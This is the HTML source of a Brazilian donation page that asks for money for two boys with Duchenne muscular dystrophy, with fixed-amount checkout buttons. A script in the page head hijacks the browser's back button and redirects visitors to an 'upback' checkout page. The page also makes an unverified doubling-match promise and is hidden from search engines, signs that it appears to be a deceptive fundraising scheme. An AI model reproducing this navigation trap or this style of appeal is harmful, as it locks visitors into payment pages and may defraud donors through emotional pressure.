<!DOCTYPE html><html lang="pt-BR" dir="ltr"><head>
<meta name="robots" content="noindex, nofollow">
<link rel="shortcut icon" href="data:">
<meta property="og:type" content="website">
<meta property="og:url" content="https://www.juntosesperanca.space/caetano">
<meta property="og:title" content="Ajude ">
<meta property="og:description" content="Ajude ">
<meta property="og:image" content="images/nblFEp8990193.png">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Ajude </title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800&family=Roboto:wght@300;400;500;600;700;800&family=Montserrat:wght@300;400;500;600;700;800&display=swap" rel="stylesheet" media="print" onload="this.onload=null;this.removeAttribute('media');">
<style>@media (max-width:640px){.atm-hidden-mobile{display:none}}@media (min-width:640px){.atm-hidden-desktop{display:none}}.col-span-1{grid-column: span 1 / span 1;}.col-span-2{grid-column: span 2 / span 2;}.items-center{align-items:center}.grid-cols-6{grid-template-columns: repeat(6, minmax(0, 1fr))}.grid-cols-5{	grid-template-columns: repeat(5, minmax(0, 1fr))}.grid-cols-4{grid-template-columns: repeat(4, minmax(0, 1fr))}.grid-cols-2{grid-template-columns: repeat(2, minmax(0, 1fr))}.grid-cols-3{grid-template-columns: repeat(3, minmax(0, 1fr))}.grid-cols-1{grid-template-columns: repeat(1, minmax(0, 1fr))}.grid{display:grid}.basis-1\/2{flex-basis:50%}.flex{display:flex}.gap-1{gap:4px}.gap-2{gap:8px}.gap-4{gap:16px}.gap-6{gap:24px}.gap-12{48px}.gap-24{gap:96px}.justify-center{justify-content:center}.basis-full{flex-basis:100%}html{scroll-behavior:smooth;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-tap-highlight-color:transparent}body,center,dd,del,div,dt,em,footer,h1,h2,h3,h4,h5,h6,i,iframe,img,p,q,s,small,span,strike,strong,sub,sup,table,tbody,td,tr,u{margin:-1px 0 0 0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline;font-family:Roboto,sans-serif}.u{-moz-user-select:none;-webkit-user-select:none;cursor:default}table{border-collapse:collapse;border-spacing:0}body{line-height:1}body{background-color:#ffffff;overflow-x:hidden}iframe,img,svg{max-width:100%}h1,h1 b,h1 span,h2,h2 b,h2 span,h3,h3 b,h3 span{font-family:Poppins,sans-serif}a{text-decoration:none;font-family:Roboto,sans-serif}a.btn{font-family:Montserrat,sans-serif}em span.lg,em span.md,em span.sm{font-style:italic}@media (max-width:600px){.flex-large,.flex-small{margin-right:0!important;margin-bottom:16px}}.flexrow{display:flex;flex-direction:row;flex-wrap:wrap;align-items:center}.flex-large,.flex-small{flex-basis:100%}.flex-large:last-child,.flex-small:last-child{margin-right:0!important}@media (min-width:600px){.flex-small{flex:1;margin-bottom:0!important;padding-bottom:0!important}.flex-small.half{flex:0 0 calc(1 / 2 * 100%)}.flex-small.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-small.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-small.one-fourth{flex:0 0 calc(1 / 4 * 100%)}.flex-small.two-fourths{flex:0 0 calc(2 / 4 * 100%)}.flex-small.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-small.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-small.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:1000px){.flex-large{flex:1;margin-bottom:0}.flex-large.half{flex:0 0 calc(1 / 2 * 100%)}.flex-large.one-fifth{flex:0 0 calc(1 / 5 * 100%)}.flex-large.two-fifths{flex:0 0 calc(2 / 5 * 100%)}.flex-large.one-fourth,.flex-large.two-fourths{flex:0 0 calc(1 / 4 * 100%)}.flex-large.three-fourths{flex:0 0 calc(3 / 4 * 100%)}.flex-large.one-third{flex:0 0 calc(1 / 3 * 100%)}.flex-large.two-thirds{flex:0 0 calc(2 / 3 * 100%)}}@media (min-width:640px){.sm\:gap-1{gap:6px}.sm\:gap-2{gap:12px!important}.sm\:gap-4{gap:24px}.sm\:gap-6{gap:32px}.sm\:gap-12{gap:64px}.sm\:gap-24{gap:128px}.sm\:grid-cols-6{grid-template-columns:repeat(6,minmax(0,1fr))}.sm\:grid-cols-5{grid-template-columns:repeat(5,minmax(0,1fr))}.sm\:grid-cols-4{grid-template-columns:repeat(4,minmax(0,1fr))}.sm\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.sm\:grid-cols-3{grid-template-columns:repeat(3,minmax(0,1fr))}.sm\:grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}}</style>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
      window.pixelId = "67d4eb1bbfe847eae3540503";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
      // Back redirect script
      let initialPage = window.location.href;
      history.pushState(null, null, initialPage);
      window.onpopstate = function (event) {
        // Only redirect if actually going back, not for anchor navigation
        if (window.location.href.indexOf("#") === -1) {
          history.go(1);
          window.location.href = "../ajude/checkout/upback/";
        }
      };
    </script>
    <!-- Meta Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '673610725229451');
  fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=673610725229451&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Meta Pixel Code -->
</head>
<body id="_e7cj9EQHiwa3lIrv2YR1zUFjGMO2" data-page="_jK44fRNicEk6L2nB0uyV">
<style>
.SYevba7623918 {display: none}
@media (max-width: 640px) {
html {overflow-x:hidden}
}
</style>
<div class="division-urisMf0962849__wrapper">
<style>
#division-urisMf0962849 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-urisMf0962849 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-urisMf0962849 {
margin: 0;
padding: 0.001vh 0vw 0.001vh 0vw;
}
}
</style>
<div id="division-urisMf0962849" class="iIYloJ7620171">
<div class="image-meKpbx0962849">
<style>
.image-meKpbx0962849-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-meKpbx0962849-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-meKpbx0962849-element img {
max-width: 90%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-meKpbx0962849-element">
<img loading="lazy" src="images/ELLieN4692918.png" alt="">
</div>
</div>
</div>
</div>
<div class="division-ewJfoy5558915__wrapper">
<style>
#division-ewJfoy5558915 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ECECEC;
}
@media (max-width:1200px) {
#division-ewJfoy5558915 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-ewJfoy5558915 {
margin: 0;
padding: 0.001vh 0vw 0.001vh 0vw;
}
}
</style>
<div id="division-ewJfoy5558915" class="MiuLim7620171">
<div class="description-EdaYQo2074410">
<style>
.description-EdaYQo2074410-element h3 {
font-size: 1.32vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 400;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.description-EdaYQo2074410-element h3 {
font-size: 1.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.description-EdaYQo2074410-element h3 {
font-size: 4.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="description-EdaYQo2074410-element ">
<h3>
SAÚDE / TRATAMENTOS
</h3>
</div>
</div>
<div class="description-PabrQk5560707">
<style>
.description-PabrQk5560707-element h3 {
font-size: 1.32vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 400;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.description-PabrQk5560707-element h3 {
font-size: 1.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.description-PabrQk5560707-element h3 {
font-size: 4.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="description-PabrQk5560707-element ">
<h3>
ID: 4507141<br>
</h3>
</div>
</div>
</div>
</div>
<div class="division-bvKoYn2164403__wrapper">
<style>
#division-bvKoYn2164403 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ECECEC;
}
@media (max-width:1200px) {
#division-bvKoYn2164403 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-bvKoYn2164403 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-bvKoYn2164403" class="DLcomK7620172">
<div class="container-fiQQKA2168122">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-fiQQKA2168122-element {
border: none;
box-shadow: none;
background-color: #ffffff;
border-radius: 16px;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-fiQQKA2168122-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-fiQQKA2168122-element {
margin: 0 auto 0 auto;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
;
}
}
</style>
<div class="container-fiQQKA2168122-element">
<div class="image-ooCQpJ5481671">
<style>
.image-ooCQpJ5481671-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 16px;
border: none;
}
@media (max-width: 1200px) {
.image-ooCQpJ5481671-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-ooCQpJ5481671-element img {
max-width: 70%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-ooCQpJ5481671-element">
<img loading="lazy" src="images/wHYnbS3147232.webp" alt="">
</div>
</div>
<div class="divider-hNsEyD4704382">
<style>
.divider-hNsEyD4704382-element {
opacity: 1;
margin: 2vh 0 2vh 0;
}
@media (max-width: 1200px) {
.divider-hNsEyD4704382-element {
margin: 1.32vh 0 1.5vh 0;
}
}
@media (max-width: 640px) {
.divider-hNsEyD4704382-element {
margin: 1vh 0 1vh 0;
}
}
</style>
<hr class="divider-hNsEyD4704382-element">
</div>
<div class="image-Nonfxx4590827">
<style>
.image-Nonfxx4590827-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: 0.25vh;
margin-top: 0.25vh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-Nonfxx4590827-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-Nonfxx4590827-element img {
max-width: 80%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-Nonfxx4590827-element">
<img loading="lazy" src="images/hnWnrI3085699.png" alt="">
</div>
</div>
<div class="divider-rNvWzB5506898">
<style>
.divider-rNvWzB5506898-element {
opacity: 1;
margin: 2vh 0 2vh 0;
}
@media (max-width: 1200px) {
.divider-rNvWzB5506898-element {
margin: 1.32vh 0 1.5vh 0;
}
}
@media (max-width: 640px) {
.divider-rNvWzB5506898-element {
margin: 1vh 0 1vh 0;
}
}
</style>
<hr class="divider-rNvWzB5506898-element">
</div>
<div class="button-MKYYHY4770623">
<style>
a.button-MKYYHY4770623-element {
background: #35cb4a;
border-radius: 16px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-MKYYHY4770623-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-MKYYHY4770623-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-MKYYHY4770623-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href="#division-NnwbNS4961309" target="_self" class="btn button-MKYYHY4770623-element track-division-NnwbNS4961309 ">
SUA AJUDA IMPORTA MUITO!🤍
</a>
</div>
</div>
</div>
</div>
</div>
<div class="division-MXFBlL2350027__wrapper">
<style>
#division-MXFBlL2350027 {
border: none;
border-radius: ;
margin: 0 0 0 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-MXFBlL2350027 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0 0 0 0;
}
}
@media (max-width:600px) {
#division-MXFBlL2350027 {
margin: 0 0.75vw 0 0.75vw;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-MXFBlL2350027" class="yCsgBD7620173">
<div class="headline-qKrBtW3982987">
<style>
.headline-qKrBtW3982987-element h1 {
font-size: 2.31vw;
text-align: left;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.3;
font-weight: 400;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.headline-qKrBtW3982987-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-qKrBtW3982987-element h1 {
font-size: 4.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: left;
}
}
</style>
<div class="headline-qKrBtW3982987-element headline">
<h1>
Meu nome é Karla Plodowski, sou casada e mãe de dois meninos, o Caetano com 17 anos e o Joaquim com 4.<br><br>Os dois são portadores de uma doença rara e degenerativa chamada Distrofia Muscular de Duchenne.<br><br>Meninos com Duchenne possuem uma falha genética que afeta na produção de uma proteína muito importante para os músculos chamada distrofina. Eles não produzem essa proteína e isso vai enfraquecendo gradativamente a força de todos os músculos do corpo, inclusive os vitais como coração e pulmões.<br><br>Nos primeiros anos eles apresentam dificuldade pra subir escada, pular e correr… com o passar do tempo, perdem a capacidade de caminhar, precisando de cadeira de rodas.<br><br>Depois de anos sem nenhuma opção de medicamento para tratar a Duchenne de forma que curasse ou mudasse significativamente o curso da doença, fora do país a FDA aprovou um medicamento único chamado Elevidys que faz o organismo passe a produzir a distrofina, porém numa escala menor e isso faz que eles praticamente sejam curados! O Elevidys é o medicamento mais caro do mundo! Custando em média 16-17 milhões de reais!!!<br><br>Após saber que algumas crianças já conseguiram judicialmente esse medicamento no Brasil mesmo sem a aprovação da ANVISA, decidimos entrar com uma ação também. Pois a cada dia que passa, essa doença vai tirando a vida dos meus filhos.<br><br>TEMOS URGÊNCIA!!!<br><br>Por isso estou aqui em nome dos meus filhos pedindo humildemente AJUDA!<br><br>Qualquer quantia é bem vinda! <br><br>
</h1>
</div>
</div>
<div class="headline-NEMctL7155918">
<style>
.headline-NEMctL7155918-element h1 {
font-size: 1.98vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 600;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.headline-NEMctL7155918-element h1 {
font-size: 3.00vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-NEMctL7155918-element h1 {
font-size: 4.50vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-NEMctL7155918-element headline">
<h1>
Doando acima de 50 reais, nós e os empresários parceiros iremos contribuir com o dobro da sua doação para atingir a meta ainda mais rápido!
</h1>
</div>
</div>
</div>
</div>
<div class="division-NnwbNS4961309__wrapper">
<style>
#division-NnwbNS4961309 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #f9f9f9;
}
@media (max-width:1200px) {
#division-NnwbNS4961309 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-NnwbNS4961309 {
margin: 0;
padding: 0.75vh 0.75vw 0.75vh 0.75vw;
}
}
</style>
<div id="division-NnwbNS4961309" class="CvnhMw7620173">
<div class="headline-XBgYtv4907794">
<style>
.headline-XBgYtv4907794-element h1 {
font-size: 2.31vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #000000;
line-height: 1.1;
font-weight: 600;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.headline-XBgYtv4907794-element h1 {
font-size: 2.80vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.headline-XBgYtv4907794-element h1 {
font-size: 5.60vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="headline-XBgYtv4907794-element headline">
<h1>
QUAL VALOR DESEJA DOAR?<br>
</h1>
</div>
</div>
<div class="container-LjIklw5111884">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-LjIklw5111884-element {
border: none;
box-shadow: none;
background-color: #f9f9f9;
border-radius: ;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-LjIklw5111884-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-LjIklw5111884-element {
margin: 0 auto 0 auto;
padding: 1.5vh 1.5vw -3.75vh 1.5vw;
;
}
}
</style>
<div class="container-LjIklw5111884-element flex items-center justify-center gap-2 sm:gap-2">
<div class="button-QzinMj5111884">
<style>
a.button-QzinMj5111884-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-QzinMj5111884-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-QzinMj5111884-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-QzinMj5111884-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/30" target="_blank" class="btn button-QzinMj5111884-element ">
R$ 30,00
</a>
</div>
<div class="button-qjHbEm5111884">
<style>
a.button-qjHbEm5111884-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-qjHbEm5111884-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-qjHbEm5111884-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-qjHbEm5111884-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/50" target="_blank" class="btn button-qjHbEm5111884-element ">
R$: 50,00
</a>
</div>
</div>
</div>
<div class="container-brcFGS5148789">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-brcFGS5148789-element {
border: none;
box-shadow: none;
background-color: #f9f9f9;
border-radius: ;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-brcFGS5148789-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-brcFGS5148789-element {
margin: 0 auto 0 auto;
padding: -3vh 1.5vw 1.5vh 1.5vw;
;
}
}
</style>
<div class="container-brcFGS5148789-element flex items-center justify-center gap-2 sm:gap-2">
<div class="button-BMleRu5148789">
<style>
a.button-BMleRu5148789-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-BMleRu5148789-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-BMleRu5148789-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-BMleRu5148789-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/75" target="_blank" class="btn button-BMleRu5148789-element ">
R$ 75,00
</a>
</div>
<div class="button-CIkrtu5148789">
<style>
a.button-CIkrtu5148789-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-CIkrtu5148789-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-CIkrtu5148789-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-CIkrtu5148789-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/100" target="_blank" class="btn button-CIkrtu5148789-element ">
R$: 100,00
</a>
</div>
</div>
</div>
<div class="container-KYYMFH5167208">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-KYYMFH5167208-element {
border: none;
box-shadow: none;
background-color: #f9f9f9;
border-radius: ;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-KYYMFH5167208-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-KYYMFH5167208-element {
margin: 0 auto 0 auto;
padding: -3vh 1.5vw 1.5vh 1.5vw;
;
}
}
</style>
<div class="container-KYYMFH5167208-element flex items-center justify-center gap-2 sm:gap-2">
<div class="button-uRfRRk5167208">
<style>
a.button-uRfRRk5167208-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-uRfRRk5167208-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-uRfRRk5167208-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-uRfRRk5167208-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/150" target="_blank" class="btn button-uRfRRk5167208-element ">
R$ 150,00
</a>
</div>
<div class="button-sNbGhY5167208">
<style>
a.button-sNbGhY5167208-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-sNbGhY5167208-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-sNbGhY5167208-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-sNbGhY5167208-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/200" target="_blank" class="btn button-sNbGhY5167208-element ">
R$: 200,00
</a>
</div>
</div>
</div>
<div class="container-AWiBrA5188158">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-AWiBrA5188158-element {
border: none;
box-shadow: none;
background-color: #f9f9f9;
border-radius: ;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-AWiBrA5188158-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-AWiBrA5188158-element {
margin: 0 auto 0 auto;
padding: -3vh 1.5vw 1.5vh 1.5vw;
;
}
}
</style>
<div class="container-AWiBrA5188158-element flex items-center justify-center gap-2 sm:gap-2">
<div class="button-YpJySG5188158">
<style>
a.button-YpJySG5188158-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-YpJySG5188158-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-YpJySG5188158-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-YpJySG5188158-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/300" target="_blank" class="btn button-YpJySG5188158-element ">
R$ 300,00
</a>
</div>
<div class="button-seEdpn5188158">
<style>
a.button-seEdpn5188158-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-seEdpn5188158-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-seEdpn5188158-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-seEdpn5188158-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/400" target="_blank" class="btn button-seEdpn5188158-element ">
R$: 400,00
</a>
</div>
</div>
</div>
<div class="container-WbClch6674304">
<style>
.justify-center {
justify-content: center;
}
@media (max-width: 640px) {
.m-justify-center {
justify-content:center;
}
}
.container-WbClch6674304-element {
border: none;
box-shadow: none;
background-color: #f9f9f9;
border-radius: ;
padding: 16px 16px 16px 16px;
text-align: ;
margin: 0 auto 0 auto;
box-sizing: border-box;
max-width: 100%;
}
@media (max-width: 1200px) {
.container-WbClch6674304-element {
margin: 0 auto 0 auto;
padding: 0.8vh 0.8vw 0.8vh 0.8vw;
}
}
@media (max-width: 640px) {
.container-WbClch6674304-element {
margin: 0 auto 0 auto;
padding: -3vh 1.5vw 1.5vh 1.5vw;
;
}
}
</style>
<div class="container-WbClch6674304-element flex items-center justify-center gap-2 sm:gap-2">
<div class="button-dRGFFA6674304">
<style>
a.button-dRGFFA6674304-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-dRGFFA6674304-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-dRGFFA6674304-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-dRGFFA6674304-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/500" target="_blank" class="btn button-dRGFFA6674304-element ">
R$ 500,00
</a>
</div>
